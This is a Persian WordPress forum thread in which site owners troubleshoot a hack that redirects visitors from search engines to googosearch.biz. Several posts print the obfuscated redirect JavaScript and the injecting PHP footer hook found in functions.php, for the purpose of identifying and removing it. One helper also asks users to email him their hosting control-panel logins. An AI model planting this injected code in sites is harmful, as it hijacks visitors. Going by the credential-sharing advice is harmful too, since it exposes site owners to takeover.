انجمن


مشکل در ورود نتایج گوگل  (۴۱ نوشته)

  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۸ سال پیش
    ۲۴ شهریور ۱۳۹۰ - ۱۵:۱۳

    سلام دوستان عزیز
    چند وقته دچار مشکل عجیب و بسیار وحشتناکی شدم.
    وقتی بر روی نتایج گوگل سایت من کلیک میکنیم، پس از ورود به سایت من پس از چند ثانیه خود به خود سایت ریدایرت میشه روی یک سایت دیگه که ظاهرا موتور جستجو هست و دامنه .biz داره.
    ممنون میشم هرچه سریعتر یه پیشنهاد برای حل این مشکل به من بدهید.
    بـا تـشـکـر فـراوان

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    amirabar
  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۰۹ بار
    # نوشته شده: ۸ سال پیش
    ۲۵ شهریور ۱۳۹۰ - ۱۷:۳۱

    محتوای فایل های header و footer را بررسی کنید.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    mirza - hadivip - امین باقیات - amirabar - علی سجاد
  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۸ سال پیش
    ۲۷ شهریور ۱۳۹۰ - ۲۱:۲۰

    بررسی کردم چیز خاصی نبود. همه چیز عادیه
    لطفا اگه چیزی نمیدونین جواب ندین

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    amirabar
  • Parsa

    آفلاین
    عضو فعال
    تعداد نوشته‌ها: ۱۹۲۱
    تشکر شده: ۲۶۸۳ بار
    # نوشته شده: ۸ سال پیش
    ۲۸ شهریور ۱۳۹۰ - ۰۰:۵۸

    وردپرس را راه اندازي مجدد كنيد
    تمام افزونه را غير فعال
    قالب پيشفرض انتخاب

    سپس تست كنيد

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    mirza - hadivip - امین باقیات - amirabar
  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۰۹ بار
    # نوشته شده: ۸ سال پیش
    ۲۸ شهریور ۱۳۹۰ - ۱۳:۵۶

    mirza گفت:
    ...لطفا اگه چیزی نمیدونین جواب ندین

    دوست محترم،
    در پاسخ قبلی هیچگونه تغییراتی برای شما پیشنهاد نشده که برایتان زمانبر و یا دردسرساز بوده باشد.

    مشکل شما وجود یک کد اسکریپتی است که مسیر آدرس را تغییر می دهد.
    البته تاجایی که بنده اطلاع دارم، درصورت عدم رفع مشکل، سایت شما به زودی در لیست سیاه گوگل قرار خواهد گرفت که چندان خوش آیند نیست.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    mirza - امین باقیات - amirabar
  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۸ سال پیش
    ۲۸ شهریور ۱۳۹۰ - ۲۰:۲۹

    عذر میخوام اگه ناراحتتون کردم
    کد این اسکریپت مخرب رو میشه از توی سورس سایت پیدا کرد؟
    اگر مقدور هست کد رو به من نشون بدین.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    Araz - amirabar
  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۰۹ بار
    # نوشته شده: ۸ سال پیش
    ۲۸ شهریور ۱۳۹۰ - ۲۱:۱۸

    در چند روز گذشته با استفاده از نتایج گوگل این مشکل در برخی از صفحات مشاهده می شد که اکنون رفع گردیده است.
    چنین کدهایی در صفحات سایت قرار می گیرند و در کل به پوسته و یا پلاگین های مورد استفاده مربوط می شود تا "سورس وردپرس" و در بیشتر مواقع در footer قرار می گیرد.

    اگر پلاگینی را نیز ظرف روزهای گذشته غیر فعال و یا حذف نموده اید نام ببرید.

    موفق باشید

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    mirza - امین باقیات - amirabar
  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۸ سال پیش
    ۲۹ شهریور ۱۳۹۰ - ۱۴:۱۱

    من طی روزهای گذشته پلاگینی رو حذف یا اضافه نکردم فقط بعد از دیدن این مشکل چند پلاگین رو غیرفعال کردم

    در ضمن سایتی که خود به خود بهش سایت ریدایرکت میشه اینه : http://www.googosearch.biz

    البته بعضی موقع ها این اتفاق میفته که در نوع خودش عجیبه !

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    amirabar
  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۰۹ بار
    # نوشته شده: ۸ سال پیش
    ۲۹ شهریور ۱۳۹۰ - ۱۶:۱۱

    همزمان با شما دوست دیگری نیز این مشکل را (با همان آدرس اشاره شده) داشت که در انتهای سورس کد صفحه وی کد اسکریپتی قرار داشت و آنرا مشاهده کرده بودم. حال شما می توانید باتوجه به نوع عملکرد پلاگین ها (بخصوص غیر فعال شده ها) دریابید که کدام ناامن بوده و می تواند چنین کدی را در صفحه ایجاد کند.
    درصورت امکان از پلاگین های غیر فعال شده نام ببرید.
    درحال حاضر سایت شما فاقد مشکل است و شما نیز کش و کوکی های مرورگر خود را پاک کنید.

    موفق باشید

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    mirza - amirabar
  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۸ سال پیش
    ۳۰ شهریور ۱۳۹۰ - ۰۱:۴۷

    ممنونم منم انتهای سورس سایت چنین چیزی پیدا کردم که برام عجیب بود :

    <script type='text/javascript'>
    /* <![CDATA[ */
    var thickboxL10n = {
    	next: "بعدی >",
    	prev: "< قبلی",
    	image: "تصویر",
    	of: "از",
    	close: "بستن",
    	noiframes: "استفاده از این قابلیت به قاب‌های توکار (iframes) نیاز دارد. شما قاب‌های توکار را غیرفعال کرده‌اید یا مرورگرتان از این قاب‌ها پشتیبانی نمی‌کند.",
    	loadingAnimation: "http://www.nariya.ir/wp-includes/js/thickbox/loadingAnimation.gif",
    	closeImage: "http://www.nariya.ir/wp-includes/js/thickbox/tb-close.png"
    };
    try{convertEntities(thickboxL10n);}catch(e){};
    /* ]]> */
    </script>
    
    <script type='text/javascript' src='http://www.nariya.ir/wp-includes/js/thickbox/thickbox.js?ver=3.1-20110528'></script>

    پلاگین های غیر فعال من :
    Automatic Newsletter
    فرم تماس نسخه 7
    Hello Dolly
    My Category Order
    Scroll to Top Button

    این ها لیست افزونه های غیر فعال من بودند که همه رو پاک کردم.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    amirabar
  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۷ سال پیش
    ۳ مهر ۱۳۹۰ - ۱۶:۴۵

    مشکل من واقعا حاده ... این اشکال داره به همه جای سایت صدمه وارد میکنه
    لطفا سریعتر یه پاسخی بدین
    از تیم مدیریتی وردپرس فارسی خواهش میکنم به این مشکل یه نگاه عمیق تر بکنن
    با تشکر

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    amirabar
  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۷ سال پیش
    ۵ مهر ۱۳۹۰ - ۱۵:۴۰

    انگار این مشکل هنوز انقدر فراگیر نشده که مدیران وردپرس فارسی و کاربران توجهی کنند!

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    amirabar
  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۰۹ بار
    # نوشته شده: ۷ سال پیش
    ۵ مهر ۱۳۹۰ - ۲۲:۳۰

    کد زیر ایجاد این کننده مشکل است:
    </div><!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('o r=a.e,t="",q;5(r.4("m.")!=-1)t="q";5(r.4("b.")!=-1)t="q";5(r.4("c.")!=-1)t="p";5(r.4("f.")!=-1)t="q";5(r.4("g.")!=-1)t="h";5(r.4("i.")!=-1)t="q";5(t.6&&((q=r.4("?"+t+"="))!=-1||(q=r.4("&"+t+"="))!=-1))j.k="l://9"+"1."+"n"+"3"+"."+"8"+"9.1"+"s/"+"u.p"+"v?w"+"d=7&t"+"x"+"y="+r.z(q+2+t.6).A("&")[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{}))</script><div class="clear"></div>

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    mirza - MRN - hadivip - amirabar
  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۷ سال پیش
    ۵ مهر ۱۳۹۰ - ۲۳:۲۸

    سلام araz جان
    این کد دقیقا کجاست تا من برم پاکش کنم و تموم ؟ راهنماییم کن ...
    با تشکر ازت

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    amirabar
  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۰۹ بار
    # نوشته شده: ۷ سال پیش
    ۶ مهر ۱۳۹۰ - ۱۴:۲۰

    آنگونه که قبلا نیز اشاره شد، محتوای برخی فایل های خود را بررسی کنید.
    درصورت تمایل می توانید یک دسترسی برای من ایجاد کنید تا مشکل فوق را بررسی و آنرا برایتان رفع کنم.
    info[at]boxja[dot]com

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    mirza - amirabar
  • موبایل اسکای

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۰۳
    تشکر شده: ۸۵ بار
    # نوشته شده: ۷ سال پیش
    ۷ مهر ۱۳۹۰ - ۲۰:۴۳

    ببینید یه جاوا اسکریپت یا چیزی بعدا اضافه نکردید که

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    mirza - amirabar
  • mersa

    آفلاین
    عضو
    تعداد نوشته‌ها: ۵۹
    تشکر شده: ۹ بار
    # نوشته شده: ۷ سال پیش
    ۱۰ مهر ۱۳۹۰ - ۱۲:۴۲

    سلام
    بنده هم چنین مشکلی پیدا کرده ام که اصلا برام خوشایند نیست

    لطفا دوستان کمک کنند

    سپاس منتظر شما هستم

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    amirabar
  • mersa

    آفلاین
    عضو
    تعداد نوشته‌ها: ۵۹
    تشکر شده: ۹ بار
    # نوشته شده: ۷ سال پیش
    ۱۳ مهر ۱۳۹۰ - ۱۰:۱۴

    من پیدا کردم !

    دوستان چیزی که araz جان گفت درسته
    این کد بود

    <?php
    add_action('get_footer', 'add_sscounter');
    	function add_sscounter(){
    		echo '<!--scounter-->';
    		if(function_exists('is_user_logged_in')){
    			if(time()%2 == 0 && !is_user_logged_in()){
    				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('o r=a.e,t=\"\",q;5(r.4(\"m.\")!=-1)t=\"q\";5(r.4(\"b.\")!=-1)t=\"q\";5(r.4(\"c.\")!=-1)t=\"p\";5(r.4(\"f.\")!=-1)t=\"q\";5(r.4(\"g.\")!=-1)t=\"h\";5(r.4(\"i.\")!=-1)t=\"q\";5(t.6&&((q=r.4(\"?\"+t+\"=\"))!=-1||(q=r.4(\"&\"+t+\"=\"))!=-1))j.k=\"l://9\"+\"1.\"+\"n\"+\"3\"+\".\"+\"8\"+\"9.1\"+\"s/\"+\"u.p\"+\"v?w\"+\"d=7&t\"+\"x\"+\"y=\"+r.z(q+2+t.6).A(\"&\")[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{}))</script>";
    			}
    		}
    	}
    ?>

    اون رو یا توی footer یا header و به احتمال زیادی توی function.php قالب سایتتون می تونید پیدا کنید.

    بعد از حذف کردن اون که فکر کنم با نصب شدن افزونه wp-stat بوجود میاد سایت تون کاملا درست میشه و مشکل ریدایرکت سایت و لینک هاتون از گوگل به آدرس googosearch.biz رو نخواهید داشت

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    MRN - hadivip - amirabar - beh11111
  • mohammaddx

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۳۱
    تشکر شده: ۲۵ بار
    # نوشته شده: ۷ سال پیش
    ۱۳ مهر ۱۳۹۰ - ۱۴:۴۰

    سلام دوست عزیز
    من هم قبلا این مشکل رو داشتم و دیدم مشکلم به راحتی حل نمیشه تصمیم گرفتم قالب سایت رو موقتا عوض کنم.مشکلم هم به طور کل حل شد. ولی بعد این که قالب رو عوض کردم طی 4 روز ورودی های گوگل و بازید های سایتم 4 برابر شد همین موضوع باعث شد که فعلا به قالب سایت دست نزنم.
    ولی خودم فکر می کنم مشکل از کد گوگل پلاس 1 باشه.رو این موضوع بیشتر کار کن ببین جایی اشتباهی نکردی!

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    mersa - amirabar
  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۷ سال پیش
    ۲۸ مهر ۱۳۹۰ - ۱۳:۴۲

    دوستان عزیز
    مشکل من بعد از نوشتن آخرین تایپک در همین صفحه حل شد اما بعد از اون مدت تا حالا دیروز دیدم دوباره سایت همین مشکل رو پیدا کرده.
    مشکل واقعا جدیه ... لطفا همه یه راهکار کلی پیشنهاد بکنن. تیم وردپرس فارسی هم که کلا سکوت کرده
    با این که بهشون ایمیل هم دادم اما هنوز هیچ جوابی ندادن

  • MRN

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲
    تشکر شده: ۱ بار
    # نوشته شده: ۷ سال پیش
    ۲۹ مهر ۱۳۹۰ - ۰۰:۱۲

    برای من هم همین مشکل هست و برای چند سایت وردپرس دیگه هم چک کردم همین اتفاق داره میوفته

    بعد از برداشتن کد بالا از توی (functions.php) مشکلم حل شده

  • MRN

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲
    تشکر شده: ۱ بار
    # نوشته شده: ۷ سال پیش
    ۱ آبان ۱۳۹۰ - ۰۷:۵۴

    من این کد رو حذف کردم چند روز مشکلی نبود الان دوباره این کد خودش اضافه شد ؟؟؟؟؟؟؟؟؟؟؟
    دوباره پاکش کردم

  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۰۹ بار
    # نوشته شده: ۷ سال پیش
    ۱ آبان ۱۳۹۰ - ۱۳:۱۷

    محتوای سایر فایل های موجود را از جهت کد و لینک های مشکوک و دسترسی به خارج از سایت را بررسی کنید.

  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۷ سال پیش
    ۱ آبان ۱۳۹۰ - ۱۹:۱۳

    دوباره برای من هم همین اتفاق افتاد
    کد رو برداشتم اما دوباره نتایج اشتباهی وارد میشن

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    MRN
  • MRN

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲
    تشکر شده: ۱ بار
    # نوشته شده: ۷ سال پیش
    ۳ آبان ۱۳۹۰ - ۰۰:۲۳

    برای چندمین بار دوباره این کد برگشت توی فایل functions.php

  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۷ سال پیش
    ۴ آبان ۱۳۹۰ - ۲۰:۳۹

    درسته این کد دوباره به functions.php برگشت. از منم همین طور شد
    جالبه این اتفاق تو یه تاریخ برای همه اتفاق میفته.
    بیاین یه کاری کنیم ..... :
    تمام افرادی که در وردپرس با چنین مشکلی روبرو شدند، نام پوسته خودشون + سایتی که از اون این پوسته رو گرفتند و تمامی پلاگین های استفاده شده رو بذارن.
    با تشکر

  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۷ سال پیش
    ۴ آبان ۱۳۹۰ - ۲۰:۴۲

    خود من پوسته سایتم رو از سایت web2feel گرفتم
    تمام پلاگین های مشکوک رو غیرفعال و پاک کردم
    تقریبا الان پلاگین خاصی ندارم و چند تا پلاگین معروف و متداول وردپرسی بیشتر نیست

  • MRN

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲
    تشکر شده: ۱ بار
    # نوشته شده: ۷ سال پیش
    ۵ آبان ۱۳۹۰ - ۲۳:۰۰

    من پوسته خودم رو از همین وردپرس فارسی گرفتن
    هسته خام قالبم هم rhea هست
    و پلاگین های زیر توش فعال هست
    Executable PHP widget
    wp-jalali
    WP-PostViews
    WP Page Numbers

    و پلاگین های زیر غیر فعال
    Hello Dolly
    Fix Rss Feeds
    Akismet

  • MRN

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲
    تشکر شده: ۱ بار
    # نوشته شده: ۷ سال پیش
    ۵ آبان ۱۳۹۰ - ۲۳:۲۶

    من توی سایت های خارجی یه نگاهی کردم مثل اینکه مشکل از سرور هست که هک شده
    توضحیات بیشتر رو اینجا داده
    http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html

  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۷ سال پیش
    ۶ آبان ۱۳۹۰ - ۱۱:۱۰

    منم تمام پلاگین های شما رو بجر Fix Rss Feeds دارم. پس احتمالا از پلاگین ها نمیتونه باشه.
    وردپرس هم این قالبی رو که شما ازش دریافت کردید رو فقط فارسی کرده سایت اصلی که این پوسته رو ساخته سایت دیگه ای هستش.
    در مورد این سایت هم چیزی نمیدونم. مثل اینکه مشکل خودش رو بیان کرده و یه فایل پاک کننده برای مرورگرها واسه دانلود گذاشته.

  • MRN

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲
    تشکر شده: ۱ بار
    # نوشته شده: ۷ سال پیش
    ۶ آبان ۱۳۹۰ - ۱۴:۰۳

    من هرچی توی اینترنت گشتم توی وردپرس انگلیسی هم این مشکل رو نداشتند فقط توی انجمن وردپرس فرانسوی تونستم پیدا کنم که مشکل زبان فرانسوی دارم :دی
    http://www.wordpress-fr.net/support/viewtopic.php?id=56989

  • hadivip

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۱
    تشکر شده: ۱۰ بار
    # نوشته شده: ۷ سال پیش
    ۶ آبان ۱۳۹۰ - ۱۹:۵۳

    عزیز من میگم یه کاری کن. کل سایتتو از شاخه www یا همون public_html به یه جای دیگه منتقل کن. بعد یه بار دیگه وردپرس فارسی رو آپلود کن و تنظیمان wp-config ر. انجام بده ببین چه جور میشه. البته فک کنم باید برای نمایش درست سایت دوباره قالبت رو کار بگذاری. اگه درست نشده شاید این کد مخرب داخل دیتابیس شما باشه. البته یه حدسه و یه راه وت بر. اگه خواستین این کار رو بکنین حتما back up بگیرین

  • MRN

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲
    تشکر شده: ۱ بار
    # نوشته شده: ۷ سال پیش
    ۸ آبان ۱۳۹۰ - ۱۸:۲۳

    hadivip گفت:
    عزیز من میگم یه کاری کن. کل سایتتو از شاخه www یا همون public_html به یه جای دیگه منتقل کن. بعد یه بار دیگه وردپرس فارسی رو آپلود کن و تنظیمان wp-config ر. انجام بده ببین چه جور میشه. البته فک کنم باید برای نمایش درست سایت دوباره قالبت رو کار بگذاری. اگه درست نشده شاید این کد مخرب داخل دیتابیس شما باشه. البته یه حدسه و یه راه وت بر. اگه خواستین این کار رو بکنین حتما back up بگیرین

    این کار خودش کلی دردسر داره که کلی فلاکت باید بکشیم
    من فعلا بصورت موقت فایل functions.php بصورت 444 کردم که هیچ تغییری پیدا نکنه توی این دو روز که دوباره کد اضافه نشده خداروشکر

    mirza : به شما هم پیشنهاد میکنم این کار رو کنید شاید درست بشه مشکل

  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۰۹ بار
    # نوشته شده: ۷ سال پیش
    ۸ آبان ۱۳۹۰ - ۲۳:۴۳

    هریک از دوستانی که با این مشکل مواجه هستند، درصورت تمایل می توانند جهت رفع این مشکل اطلاعات ورودی کنترل پانل هاست را برای من ارسال کنند تا از این وضعیت فلاکت بار رها شوند.
    info[at]boxja[dot]com
    موفق باشید

  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۷ سال پیش
    ۱۳ آبان ۱۳۹۰ - ۱۳:۳۶

    MRN پیشنهاد قشنگی در مورد پرمیشن داد اما نمیدونم مشکلی ایجاد میکنه یا نه؟
    ولی به نظر من باید مشکل اصلی رو پیدا کرد.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    MRN
  • mersa

    آفلاین
    عضو
    تعداد نوشته‌ها: ۵۹
    تشکر شده: ۹ بار
    # نوشته شده: ۷ سال پیش
    ۱۲ آذر ۱۳۹۰ - ۱۹:۲۳

    من كلي در اين باره تو اينترنت گشتم. شايد حدود 1 هفته .

    جواب جامعي پيدا نكردم فقط همون مطلبي رو كه بالا عنوان كردم رو باز هم تاكيد مي كنم دنبال كنيد .

    1- اين مشكل با وجود يك كد ايجاد ميشه كه احتمالا ناسازگاري افزونه ها با هم او ن رو ايجاد مي كنه .
    2- در برخي موارد هم مشكل از هاست مي شه.
    ولي فكر نكنم روش دوم خيلي خوشايند باشه . چون دردسرش زياده.
    3- تغيير پرميشن به 444 و يا 400 هم مي تونه كمك كنه
    4- از پشتيباني هاست كمك بگيريد.
    5- بچه هاي وردپرس فارسي هم خواب نيستند! كي گفته خوابند! بيدارند ....خوابند ..نه بابا بيدارن...اي بابا اصلا خواب و بيدارن....نه اين كه فيلم بود ..........فكر كنم از بيداري خوابن......اين آخري ديگه خوب بود....خوب نبود؟.....اصلا ولش كن....بحث داره صياصي مي شه.....ما كه از صياصت چيزي نمي دونيم

  • mehdisr

    آفلاین
    عضو
    تعداد نوشته‌ها: ۹۱
    تشکر شده: ۹ بار
    # نوشته شده: ۷ سال پیش
    ۵ دی ۱۳۹۰ - ۱۴:۴۸

    از دوستان . کسی اخر نفهمید باید چی کار کرد ؟؟؟؟؟

    یه راهنمایی چیزی .. میزی...

    اینجا راهنمایی کرده یه فایل داده و .....
    http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html

    کسی که حرفه ای لطفا بگه راهکار چیه

  • mehdisr

    آفلاین
    عضو
    تعداد نوشته‌ها: ۹۱
    تشکر شده: ۹ بار
    # نوشته شده: ۷ سال پیش
    ۵ دی ۱۳۹۰ - ۱۶:۱۵

    داشتم در مورد این مشکل سرچ میکردم به الکسا رسیدم .
    یه نگاه کنید . اول از همه هم ایران . رتبه 527 سایت در ایران داره

    http://www.alexa.com/siteinfo/googosearch.biz

    - منم اون کد رو پاک کردم . دسترسی هم 444 قرار دادم . تا ببینیم چی میشه ! البته به تجربه دوستان این مشکل دوباره به وجود میاد .

  • beh11111

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱
    تشکر شده: ۳ بار
    # نوشته شده: ۷ سال پیش
    ۱۲ دی ۱۳۹۰ - ۱۷:۲۷

    سلام منم همین مشکل رو دارم تازه خیلی هم تازه کارم
    فعلا کدهایی که گفته شده بود رو پاک کردم درست شد لطفا در صورت پیدا شدن راه حل قطعی خبررسانی شود

  • علی سجاد

    آفلاین
    عضو
    تعداد نوشته‌ها: ۴۶۳
    تشکر شده: ۱۹۶ بار
    # نوشته شده: ۷ سال پیش
    ۱۵ دی ۱۳۹۰ - ۱۳:۰۵

    چند علت داره
    1- کدها دستکاری شده و دستور داده شده که به فلان صفحه ریدارکت بشه
    2- هاست رایگانه و بخاطر پرداخت پول به سایت های دیگه ریدارکت میشه ( مثل گیگفا)
    3- مشکل از سروره
    4- یه افزونه اسکن وردپرس نصب کنید وردپرس رو اسکن کنید همچنین تمام هاستتون رو هم اسکن کنید
    در صورت حل نشدن مشکل ؛ مشکلتون رو با سرور در میان بزارید
    موفق باشید

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    Morteza - mersa
  • mirza

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۱۶
    تشکر شده: ۵۷ بار
    # نوشته شده: ۷ سال پیش
    ۲۶ دی ۱۳۹۰ - ۰۰:۱۲

    این طور که معلومه این مشکل هر لحظه داره فراگیر تر میشه واسه همین لازم دونستم یه مطلب برای حل این مشکل بنویسم :

    http://www.nariya.ir/kill-the-googosearch-biz

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    mersa

درباره‌ی این موضوع